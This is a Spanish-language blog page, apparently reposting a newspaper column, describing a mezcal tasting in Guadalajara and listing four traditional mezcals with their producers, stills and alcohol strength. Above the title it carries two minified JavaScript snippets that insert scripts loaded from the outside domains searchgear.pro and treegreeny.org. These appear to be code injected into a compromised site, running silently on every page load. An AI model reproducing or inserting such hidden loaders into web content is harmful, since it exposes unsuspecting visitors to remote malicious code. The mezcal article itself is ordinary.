;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 23. Saboreada en Guadalajara

23. Saboreada en Guadalajara


El jueves 6 de mayo, la Logia de los Mezcólatras sesionó en La Tequila, impresionante restaurante de comida mexicana localizado en la hermosísima Perla de Occidente. A la sesión acudieron 70 valerosos y amigables jaliscienses, quienes saborearon los siguientes Mezcales Tradicionales:
1. Mezcal de Maguey Ixtero Amarillo cultivado, que tarda en madurar entre 12 y 15 años. Fue elaborado por el Maestro Tabernero Macario Partida en Zapotitlán de Vadillo, Jalisco, en diciembre de 2009; se destiló en alambique de cobre con capitel de tronco de parota ahuecado mediante un proceso de doble destilación. La producción fue de 100 litros y su riqueza alcohólica de 49% ALC. VOL.
2. Mezcal de Maguey San Martinero cultivado, cuya maduración dilata 13 años. Lo elaboró el Maestro Mezcalillero Gregorio Hernández en La Compañía, Ejutla, Oaxaca, en septiembre de 2008. Fue destilado en alambique de cobre con platillos en una sola destilación. Se obtuvieron 125 litros a una riqueza alcohólica de 54.4% ALC. VOL.
3. Mezcal de Maguey Cenizo silvestre que madura entre 8 y 10 años. El productor fue el Maestro Vinatero Alejandro Solís en Nombre de Dios, Durango, en abril de 2010. El destilador está formado por una olla de cobre con capitel de tiras de pino, al que llaman viejo. Fue destilado mediante doble destilación; su riqueza alcohólica era de 47.4% ALC. VOL. Producción: 70 litros.
4. Mezcal de 3 Magueyes: Maguey Espadín (cultivo de 8 a 11 años), Maguey San Martinero (13 años de cultivo) y Maguey Tobalá silvestre (de 10 años). El Maestro Mezcalillero fue Gonzalo Hernández, quien vive en La Compañía, Ejutla, Oaxaca. Fue destilado en alambique de cobre con platillos en una destilación en septiembre de 2008. Litraje: 165 litros. Riqueza alcohólica: 61.1% ALC. VOL.
Y si de Guadalajara se da un brinquito a Morelia, el martes 11 se puede asistir a la inauguración de La Casona del Mezcal (Galeana 36, Centro, tel: 443- 317 49 02), donde podrán saborearse y adquirirse Mezcales Tradicionales michoacanos.
http://impreso.milenio.com/node/8763738

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *